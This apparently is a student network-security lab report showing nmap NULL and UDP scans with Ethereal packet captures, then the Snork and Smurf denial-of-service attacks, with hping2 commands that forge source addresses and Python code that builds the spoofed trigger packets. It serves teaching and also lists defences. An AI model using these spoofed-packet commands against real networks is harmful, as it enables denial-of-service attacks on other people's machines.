Host Knoppix (127.0.0.1) appears to be up ... good.
Initiating NULL Scan against Knoppix (127.0.0.1)
The NULL Scan took 12 seconds to scan 1 ports.
Adding open port 80/tcp
Interesting ports on Knoppix (127.0.0.1):
Port       State       Service
80/tcp     open        http

Nmap run completed -- 1 IP address (1 host up) scanned in 12.024 seconds

root@ttyp1[knoppix]# nmap -sN -P0 -v -p 90 127.0.0.1

Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
Host Knoppix (127.0.0.1) appears to be up ... good.
Initiating NULL Scan against Knoppix (127.0.0.1)
The NULL Scan took 0 seconds to scan 1 ports.
The 1 scanned port on Knoppix (127.0.0.1) is: closed

Nmap run completed -- 1 IP address (1 host up) scanned in 0.004 seconds

The capture that the Ethereal sniffer made of both commands was the following:
Frame 1 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:56:10.849565000
    Time delta from previous packet: 0.000000000 seconds
    Time relative to first packet: 0.000000000 seconds
    Frame Number: 1
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0xb5b3
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 54
    Protocol: TCP (0x06)
    Header checksum: 0xd11a (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 42382 (42382), Dst Port: www (80), Seq: 0, Ack: 0, Len: 0
    Source port: 42382 (42382)
    Destination port: www (80)
    Sequence number: 0
    Header length: 20 bytes
    Flags: 0x0000 ()
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...0 .... = Acknowledgment: Not set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 3072
    Checksum: 0x0004 (correct)

Frame 2 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:56:16.852470000
    Time delta from previous packet: 6.002905000 seconds
    Time relative to first packet: 6.002905000 seconds
    Frame Number: 2
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0xe56a
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 54
    Protocol: TCP (0x06)
    Header checksum: 0xa163 (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 42383 (42383), Dst Port: www (80), Seq: 0, Ack: 0, Len: 0
    Source port: 42383 (42383)
    Destination port: www (80)
    Sequence number: 0
    Header length: 20 bytes
    Flags: 0x0000 ()
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...0 .... = Acknowledgment: Not set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 3072
    Checksum: 0x0003 (correct)

Frame 3 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:56:41.368966000
    Time delta from previous packet: 24.516496000 seconds
    Time relative to first packet: 30.519401000 seconds
    Frame Number: 3
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0xd292
    Flags: 0x00
        .0.. = Don't fragment: Not set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 37
    Protocol: TCP (0x06)
    Header checksum: 0xc53b (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 60898 (60898), Dst Port: 90 (90), Seq: 0, Ack: 0, Len: 0
    Source port: 60898 (60898)
    Destination port: 90 (90)
    Sequence number: 0
    Header length: 20 bytes
    Flags: 0x0000 ()
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...0 .... = Acknowledgment: Not set
        .... 0... = Push: Not set
        .... .0.. = Reset: Not set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 2048
    Checksum: 0xbba5 (correct)

Frame 4 (54 on wire, 54 captured)
    Arrival Time: Mar 25, 2006 19:56:41.368992000
    Time delta from previous packet: 0.000026000 seconds
    Time relative to first packet: 30.519427000 seconds
    Frame Number: 4
    Packet Length: 54 bytes
    Capture Length: 54 bytes
Ethernet II
    Destination: 00:00:00:00:00:00 (XEROX_00:00:00)
    Source: 00:00:00:00:00:00 (XEROX_00:00:00)
    Type: IP (0x0800)
Internet Protocol, Src Addr: Knoppix (127.0.0.1), Dst Addr: Knoppix (127.0.0.1)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
        0000 00.. = Differentiated Services Codepoint: Default (0x00)
        .... ..0. = ECN-Capable Transport (ECT): 0
        .... ...0 = ECN-CE: 0
    Total Length: 40
    Identification: 0x0000
    Flags: 0x04
        .1.. = Don't fragment: Set
        ..0. = More fragments: Not set
    Fragment offset: 0
    Time to live: 64
    Protocol: TCP (0x06)
    Header checksum: 0x3cce (correct)
    Source: Knoppix (127.0.0.1)
    Destination: Knoppix (127.0.0.1)
Transmission Control Protocol, Src Port: 90 (90), Dst Port: 60898 (60898), Seq: 0, Ack: 0, Len: 0
    Source port: 90 (90)
    Destination port: 60898 (60898)
    Sequence number: 0
    Acknowledgement number: 0
    Header length: 20 bytes
    Flags: 0x0014 (RST, ACK)
        0... .... = Congestion Window Reduced (CWR): Not set
        .0.. .... = ECN-Echo: Not set
        ..0. .... = Urgent: Not set
        ...1 .... = Acknowledgment: Set
        .... 0... = Push: Not set
        .... .1.. = Reset: Set
        .... ..0. = Syn: Not set
        .... ...0 = Fin: Not set
    Window size: 0
    Checksum: 0xc391 (correct)

As can be seen, Ethereal captured four frames. In frame 1 nmap (from port 42382) sends a segment with no flags set at all (0x0000) to port 80 (http). In frame 2 nmap retransmits the flagless probe from port 42383 to port 80 after the six-second timeout. nmap reports port 80 as open because neither probe drew a RST from port 80, for the same RFC 793 reason as the FIN and Xmas scans, and with the same two caveats: a firewall that drops the probe produces the same silence (later nmap releases say open|filtered), and non-compliant stacks reset every out-of-state segment and so show every port as closed. In frame 3 nmap, from port 60898, sends a flagless segment to port 90. In frame 4 port 90 answers with RST and ACK to nmap's port 60898, and on seeing that RST nmap concludes immediately that port 90 is closed (no service listening). Note that this RST carries acknowledgement number 0, whereas the RSTs in the FIN and Xmas scans carried 1: RFC 793 has a closed port acknowledge SEG.SEQ+SEG.LEN, and a FIN counts as one octet of sequence space while an empty flagless segment counts as none.
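The three scans above (FIN, Xmas and Null) differ only in the flag bits of one bare 20-byte TCP header, and nmap's verdict depends only on whether a RST comes back. The Python below is a worked example added here; it is not part of the original lab report and is not nmap's code. It builds those headers from the values Ethereal decoded (addresses, ports, windows, sequence numbers), recomputes the TCP checksum over the RFC 793 pseudo-header so the result can be compared with the checksums in the captures (0xea97, 0xebff, 0x0004 for the three probes to port 80 and 0x284e for the RST/ACK reply from port 90), and then applies nmap's decision rule to the reply. The function names and the probe table are this example's own; nothing is sent on the wire and only the standard library is used.

```python
"""
Added example (not from the original lab report, not nmap's code): rebuild the
bare TCP segments that nmap -sF, -sX and -sN send, check them against the
checksums Ethereal showed in the captures above, and apply nmap's rule for
turning the reply (or its absence) into a port state.
"""
import struct
from ipaddress import IPv4Address

# TCP flag bits, low byte of the data-offset/flags word (RFC 793)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
PROBES = {"FIN": FIN, "XMAS": FIN | PSH | URG, "NULL": 0}   # 0x01, 0x29, 0x00


def inet_checksum(data: bytes) -> int:
    """RFC 1071: ones'-complement sum of 16-bit words, then complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return 0xFFFF ^ total


def tcp_segment(src_ip, dst_ip, sport, dport, flags, window, seq=0, ack=0) -> bytes:
    """20-byte TCP header, no options, no data, with a valid checksum."""
    hdr = struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                      (5 << 12) | flags,    # data offset = 5 words, flags in low bits
                      window, 0, 0)         # checksum placeholder, urgent pointer 0
    pseudo = struct.pack("!4s4sBBH", IPv4Address(src_ip).packed,
                         IPv4Address(dst_ip).packed, 0, 6, len(hdr))
    csum = inet_checksum(pseudo + hdr)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:]


def tcp_fields(segment: bytes) -> dict:
    """Decode the fields Ethereal prints for the headers above."""
    sport, dport, seq, ack, off_flags, window, csum, _urg = struct.unpack("!HHIIHHHH", segment[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": off_flags & 0x3F, "window": window, "checksum": csum}


def probe_name(flags: int) -> str:
    """Which of the three 'inverse' scans a captured probe belongs to."""
    for name, bits in PROBES.items():
        if flags == bits:
            return name
    return "other"


def port_state(reply) -> str:
    """nmap's rule for FIN/Xmas/Null probes.

    reply is None (nothing came back after the retransmission), an int with the
    TCP flags of the answer, or a tuple ("icmp", type, code).
    """
    if reply is None:
        # The old nmap above prints 'open'. Later releases say open|filtered,
        # because a filter that silently drops the probe looks exactly like an
        # open port that obeys RFC 793 and discards the segment.
        return "open|filtered"
    if isinstance(reply, int):
        return "closed" if reply & RST else "unexpected"
    kind, icmp_type, code = reply
    if kind == "icmp" and icmp_type == 3 and code in (1, 2, 3, 9, 10, 13):
        return "filtered"                  # destination unreachable, admin-prohibited etc.
    return "unexpected"


if __name__ == "__main__":
    # Frame 1 of the FIN scan: 127.0.0.1:49913 -> 127.0.0.1:80, window 1024
    fin = tcp_segment("127.0.0.1", "127.0.0.1", 49913, 80, PROBES["FIN"], 1024)
    f = tcp_fields(fin)
    print(probe_name(f["flags"]), hex(f["checksum"]), port_state(None))
    # Frame 4: the RST/ACK from port 90 acknowledging the FIN
    rst = tcp_segment("127.0.0.1", "127.0.0.1", 90, 35109, RST | ACK, 0, seq=0, ack=1)
    print(hex(tcp_fields(rst)["checksum"]), port_state(tcp_fields(rst)["flags"]))
```

The checksum agreeing with the capture is the useful check here: it confirms that the pseudo-header (both addresses, protocol 6, segment length) is part of what the receiving stack validates, so a forged probe with a spoofed source must be re-checksummed, which is exactly what nmap and hping2 do internally.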

Exercise 3: The Snork attack


Suppose we are using a machine on a LAN with network address 10.30.0.0/16. Using Nmap, we have found a machine with IP 10.30.15.15 running the UDP/ECHO service and another with IP 10.30.30.30 running the UDP/CHARGEN service.

1) Give the Nmap commands you would have used to explore the UDP services of the machines 10.30.15.15 and 10.30.30.30.
The nmap commands we would have used are the following:
root@ttyp0[knoppix]# nmap -sU -v 10.30.15.15

Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
WARNING: Could not determine what interface to route packets through to 10.30.15.15, changing ping scantype to ICMP ping only
pcap_open_live: bind: No such device
There are several possible reasons for this, depending on your operating system:
LINUX: If you are getting Socket type not supported, try modprobe af_packet or recompile your kernel with SOCK_PACKET enabled.
*BSD: If you are getting device not configured, you need to recompile your kernel with Berkeley Packet Filter support. If you are getting No such file or directory, try creating the device (eg cd /dev; MAKEDEV <device>; or use mknod).
SOLARIS: If you are trying to scan localhost and getting '/dev/lo0: No such file or directory', complain to Sun. I don't think Solaris can support advanced localhost scans. You can probably use "-P0 -sT localhost" though.
QUITTING!

root@ttyp0[knoppix]# nmap -sU -v 10.30.30.30

Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
WARNING: Could not determine what interface to route packets through to 10.30.30.30, changing ping scantype to ICMP ping only
pcap_open_live: bind: No such device
There are several possible reasons for this, depending on your operating system:
LINUX: If you are getting Socket type not supported, try modprobe af_packet or recompile your kernel with SOCK_PACKET enabled.
*BSD: If you are getting device not configured, you need to recompile your kernel with Berkeley Packet Filter support. If you are getting No such file or directory, try creating the device (eg cd /dev; MAKEDEV <device>; or use mknod).
SOLARIS: If you are trying to scan localhost and getting '/dev/lo0: No such file or directory', complain to Sun. I don't think Solaris can support advanced localhost scans. You can probably use "-P0 -sT localhost" though.
QUITTING!
root@ttyp0[knoppix]#

As expected, both commands fail: our Knoppix has only the loopback interface (see the ifconfig output in exercise 1), so there is no route to 10.30.15.15 or 10.30.30.30, nmap cannot work out which interface to send through, and pcap_open_live fails on the device it guessed. On the real 10.30.0.0/16 LAN the same -sU scan, restricted to the two ports of interest, would answer the question; bear in mind that a UDP scan marks a port closed only when an ICMP port unreachable comes back, so a silent port is reported as open (open|filtered in later nmap releases), and that many kernels rate-limit those ICMP replies, which makes full-range UDP scans slow. If we try the same command against 127.0.0.1, nmap no longer errors out and gives a coherent result:
root@ttyp0[knoppix]# nmap -sU -v 127.0.0.1

Starting nmap V. 3.10ALPHA4 ( www.insecure.org/nmap/ )
Host Knoppix (127.0.0.1) appears to be up ... good.
Initiating UDP Scan against Knoppix (127.0.0.1)
The UDP Scan took 1 second to scan 1468 ports.
All 1468 scanned ports on Knoppix (127.0.0.1) are: closed

Nmap run completed -- 1 IP address (1 host up) scanned in 1.911 seconds

So no UDP port is open on this address: every one of the 1468 probes was answered with an ICMP port unreachable, which is the only evidence nmap accepts for a closed UDP port. In particular, neither echo (7/udp) nor chargen (19/udp) is running on the Knoppix, so the machine itself cannot be used as a Snork reflector in its default configuration.

2) Explain what the Snork DoS attack consists of.


Like most protocol suites, TCP/IP includes simple loopback tests that let you verify that communication works: a special message is sent to the destination host, which recognises it and returns a reply to the sender. At the network layer this is ICMP echo request / echo reply (what ping uses). At the application layer there is the ECHO service (RFC 862), which listens on TCP and UDP port 7 and sends back to the sender whatever it receives; it is not part of IP itself but a small service usually run from inetd. Alongside it, many UNIX-type systems provide CHARGEN (CHARacter GENerator, RFC 864), which answers any datagram it receives with an arbitrary string of characters without checking who asked; it listens on port 19, also for UDP datagrams. Both services answer unconditionally to whatever source address and port the datagram claims, which is the property the attack abuses. On Windows NT systems the Snork attack is usually aimed at UDP port 135 (Microsoft Locator Service), which reacts to unsolicited datagrams in the same way.


The attack consists of crossing the two services: a forged datagram is sent to CHARGEN (which returns a pseudo-random string of characters) with a spoofed source address and a spoofed source port, so that the "reply port" is the ECHO port (which answers any datagram) on the machine to be attacked. CHARGEN answers the ECHO port, ECHO answers CHARGEN, and an endless ping-pong begins; since both services reply to everything and neither keeps any state, a single forged datagram is enough to start it and the attacker need not stay involved. The attack can be run between two or more computers (consuming bandwidth and degrading the performance of the whole network) or against a single computer (which sends the request to itself and answers it), exhausting the resources of the attacked machine, CPU and memory in particular. The defences follow from the mechanism: do not run echo, chargen and similar "internal" inetd services at all, filter UDP ports 7 and 19 at the perimeter, and drop datagrams whose source address cannot legitimately come from where they arrive.

3) Explain why the two machines explored are vulnerable to this attack.
These machines are vulnerable because the reflector machine (10.30.15.15) has the ECHO port enabled (UDP port 7) and the victim machine (10.30.30.30) has the CHARGEN port enabled (UDP port 19). By sending a suitable datagram to one of these ports with the source address and source port forged to point at the other (a weakness of the IP protocol, which neither authenticates nor verifies the source address of a datagram: any well-formed header is accepted, so a host cannot tell a forged source from a real one), an attacker creates an endless loop of requests and replies between the pair of machines, or on a single one, for as long as the required UDP ports are up and in service. The roles of "reflector" and "victim" are interchangeable here: both machines receive the full traffic of the loop.

4) Explain the parameters with which you would call the hping2 command on your machine to send a UDP packet that starts the infinite loop between 10.30.15.15 and 10.30.30.30.
After reading the command's documentation at http://www.hping.org/manpage.html and in the Knoppix man page, I have concluded that one possible valid command would be:
root@ttyp1[knoppix]# hping2 --udp --baseport 19 --destport 7 --keep -a 10.30.30.30 10.30.15.15
Warning: Unable to guess the output interface
HPING 10.30.15.15 (lo 10.30.15.15): udp mode set, 28 headers + 0 data bytes
[send_ip] sendto: Network is unreachable

The command returns an error because, from my local machine, there is no route to the destination 10.30.15.15. In the command we specify that the packet is UDP (--udp), that the source port is 19 (--baseport 19), that the destination port is 7 (--destport 7), that the source IP address is forged to be the victim's (-a 10.30.30.30), and that the destination is the reflector machine (10.30.15.15). Note that the destination address is not spoofed; it is simply where the datagram is delivered, and it is the reply to the forged source that closes the loop. The --keep option stops hping2 from incrementing the source port by one for every packet it sends (its default behaviour), so every datagram leaves from port 19 and the echo reply lands on the victim's CHARGEN port. The "28 headers + 0 data bytes" reported by hping2 are the 20-byte IP header plus the 8-byte UDP header, with an empty payload; the payload does not matter, since ECHO returns whatever it gets and CHARGEN answers anything. hping2 keeps sending one datagram per second until interrupted, but the attacker's own traffic is not what does the damage: a single datagram is enough to start the loop.

Note: testing this command on a Knoppix 3.7, on the same machine, with the IP 127.0.0.1 as both the reflector and the victim, with the hping2 command:

hping2 --udp --baseport 19 --destport 7 --keep -a 127.0.0.1 127.0.0.1

and uncommenting in /etc/inetd.conf the entries for the UDP CHARGEN and ECHO ports (because by default these ports are closed to prevent this type of attack), I was able to verify that the loop did occur and that the CPU percentage assigned to this process climbed to the maximum possible until I stopped the command.

Exercise 4: The Smurf attack


1) Explain what the Smurf attack consists of.
ICMP is the protocol that carries control and error messages for IP datagrams travelling across the Internet. It provides functions ranging from reporting anomalous situations (an IP packet could not be delivered) to checking whether a machine on the Internet is reachable (ping-pong, or ECHO request / ECHO REPLY). The Smurf attack forges the source address of an ICMP ECHO request (ping): as source address we put the IP address of the machine to be attacked, and as destination address the broadcast address of the local network, or of whatever network we use as a launch pad, to swamp the chosen system. With this fraudulent request, every machine on that network that answers broadcast pings replies at the same time to the same host, consuming the available bandwidth and saturating the chosen computer. The attacker sends one packet per round and the victim receives one reply per responding host, so the network acts as an amplifier whose gain is the number of hosts that answer; the attacker's own address never appears in the traffic.

2) Assuming we are on the network of the previous exercise, give and comment on the hping2 instruction you would use to launch a Smurf attack against the machine 10.30.45.45.
After reading the command's documentation at http://www.hping.org/manpage.html and in the Knoppix man page, I have concluded that one possible valid command would be:
root@ttyp1[knoppix]# hping2 --icmp -a 10.30.45.45 10.30.255.255
Warning: Unable to guess the output interface
HPING 10.30.255.255 (lo 10.30.255.255): icmp mode set, 28 headers + 0 data bytes
[send_ip] sendto: Network is unreachable

The command returns an error because, from my local machine, there is no route to the destination 10.30.255.255 (the broadcast address of the network). In the command we specify that the packet is ICMP (--icmp; in this mode hping2 sends ICMP echo requests by default), that the source IP address is forged to be the victim's (-a 10.30.45.45), and that the destination is the broadcast address of the local network (10.30.255.255, the last address of 10.30.0.0/16). As in the Snork command, the destination is not spoofed: it is the real destination, and it is the replies to the forged source that hit the victim. The "28 headers" are again the 20-byte IP header plus the 8-byte ICMP echo header, with no payload; in a real attack the packet would be sent as fast as possible and with a payload, since every byte sent is multiplied by the number of responding hosts.

3) What requirements must be met for the attack to be effective?


Three things must hold on the network used as amplifier (in this exercise, the 10.30.0.0/16 network that the victim also belongs to). First, it must be possible to send messages to the network's broadcast address: the router or network device must accept directed broadcasts and deliver them to all machines on the segment rather than discarding them (here the attacker is already on the LAN, so the local broadcast suffices; from outside, the router would have to forward a packet addressed to 10.30.255.255, which routers have disabled by default since the original Smurf incidents). Second, the hosts on that network must answer ICMP echo requests addressed to the broadcast address; current Linux kernels ignore them by default (the sysctl net.ipv4.icmp_echo_ignore_broadcasts is set to 1) and most other modern stacks behave the same, which is what made the classic Smurf attack largely ineffective. Third, nothing on the path may drop datagrams with a forged source address (no ingress or egress anti-spoofing filtering of the kind recommended in BCP 38), and the amplifier's replies must be routable to the victim. The more hosts that reply, the greater the amplification and the more effective the attack.
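The Snork trigger of exercise 3 and the Smurf trigger of exercise 4 are both a single forged datagram carrying a source address the sender does not own. The Python below is a worked example added here; it is not part of the original lab report and is not hping2's code. It builds those two packets byte for byte (IPv4 + UDP from 10.30.30.30:19 to 10.30.15.15:7, and an ICMP echo request from 10.30.45.45 to 10.30.255.255, the same 28 header bytes hping2 reported) with valid IP, UDP and ICMP checksums, verifies them the way a receiving stack would, and then simulates how an unhardened ECHO and CHARGEN bounce the datagram between the two hosts without end. The "ignore low source ports" switch is this example's model of a hardening that several inetd implementations adopted for their internal services; the threshold of 1024 is an assumption of this example, as are all the function names. Nothing is sent on the wire.

```python
"""
Added example (not from the original lab report, not hping2's code): build the
spoofed UDP datagram that starts a Snork loop and the spoofed ICMP echo request
that starts a Smurf attack, check their checksums, and simulate the echo/chargen
ping-pong that Snork relies on.  Everything runs in memory.
"""
import struct
from ipaddress import IPv4Address

ECHO_PORT, CHARGEN_PORT = 7, 19           # RFC 862 and RFC 864 services
PROTO_ICMP, PROTO_UDP = 1, 17


def inet_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum; verifies to 0 over data that already carries it."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return 0xFFFF ^ total


def ipv4_header(src: str, dst: str, proto: int, payload_len: int, ttl: int = 64) -> bytes:
    """20-byte IPv4 header. src is whatever we claim, exactly like hping2 -a."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, ttl, proto, 0,
                      IPv4Address(src).packed, IPv4Address(dst).packed)
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]


def udp_datagram(src: str, dst: str, sport: int, dport: int, payload: bytes = b"") -> bytes:
    """IPv4 + UDP datagram; the UDP checksum covers the pseudo-header, so it must use the spoofed src."""
    length = 8 + len(payload)
    udp = struct.pack("!HHHH", sport, dport, length, 0) + payload
    pseudo = struct.pack("!4s4sBBH", IPv4Address(src).packed, IPv4Address(dst).packed, 0, PROTO_UDP, length)
    csum = inet_checksum(pseudo + udp) or 0xFFFF      # RFC 768: a zero checksum means "none"
    udp = udp[:6] + struct.pack("!H", csum) + udp[8:]
    return ipv4_header(src, dst, PROTO_UDP, length) + udp


def icmp_echo(src: str, dst: str, ident: int = 0x1234, seq: int = 1, payload: bytes = b"") -> bytes:
    """IPv4 + ICMP echo request (type 8); every host that answers replies to src."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    return ipv4_header(src, dst, PROTO_ICMP, len(icmp)) + icmp


def parse(pkt: bytes):
    """(src, dst, proto, sport, dport, payload) for the packets built above."""
    ihl = (pkt[0] & 0x0F) * 4
    src, dst, proto = str(IPv4Address(pkt[12:16])), str(IPv4Address(pkt[16:20])), pkt[9]
    body = pkt[ihl:]
    if proto == PROTO_UDP:
        sport, dport = struct.unpack("!HH", body[:4])
        return src, dst, proto, sport, dport, body[8:]
    return src, dst, proto, None, None, body


def verify(pkt: bytes) -> bool:
    """What a receiving stack checks: IP header checksum plus the UDP or ICMP checksum."""
    ihl = (pkt[0] & 0x0F) * 4
    if inet_checksum(pkt[:ihl]) != 0:
        return False
    body = pkt[ihl:]
    if pkt[9] == PROTO_UDP:
        pseudo = struct.pack("!4s4sBBH", pkt[12:16], pkt[16:20], 0, PROTO_UDP, len(body))
        return inet_checksum(pseudo + body) == 0
    if pkt[9] == PROTO_ICMP:
        return inet_checksum(body) == 0
    return False


def reflect(pkt: bytes, ignore_low_source_ports: bool = False):
    """What the inetd service on the destination sends back, or None if it stays silent.

    ignore_low_source_ports models a hardening found in several inetd versions: the
    internal services refuse requests whose source port is itself a privileged port
    (so another echo/chargen cannot drive them). The 1024 threshold is an assumption.
    """
    src, dst, proto, sport, dport, payload = parse(pkt)
    if proto != PROTO_UDP:
        return None
    if ignore_low_source_ports and sport < 1024:
        return None
    if dport == ECHO_PORT:
        reply = payload                                   # RFC 862: return exactly what arrived
    elif dport == CHARGEN_PORT:
        reply = bytes(range(0x21, 0x7F))[:72] + b"\r\n"   # RFC 864: a line of the printable pattern
    else:
        return None
    # The reply goes to the *claimed* source, i.e. to the other victim: no state, no check.
    return udp_datagram(dst, src, dport, sport, reply)


def snork_rounds(trigger: bytes, limit: int = 1000, hardened: bool = False) -> int:
    """Reflections before a host stays silent; reaching limit means the loop never ends."""
    pkt, n = trigger, 0
    while n < limit:
        pkt = reflect(pkt, hardened)
        if pkt is None:
            break
        n += 1
    return n


if __name__ == "__main__":
    snork = udp_datagram("10.30.30.30", "10.30.15.15", CHARGEN_PORT, ECHO_PORT)  # the hping2 --udp command
    smurf = icmp_echo("10.30.45.45", "10.30.255.255")                            # the hping2 --icmp command
    print(len(snork), verify(snork), snork_rounds(snork, 100), snork_rounds(snork, 100, hardened=True))
    print(len(smurf), verify(smurf), parse(smurf)[:2])
```

Two things the simulation makes visible that the prose does not: the first ECHO reply to an empty trigger is itself empty, yet CHARGEN still answers it with a full line, so the loop grows to CHARGEN's output size after one round; and the hardened reflector stops the loop at the very first hop, because the trigger's forged source port (19) is exactly the kind of port the check rejects.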

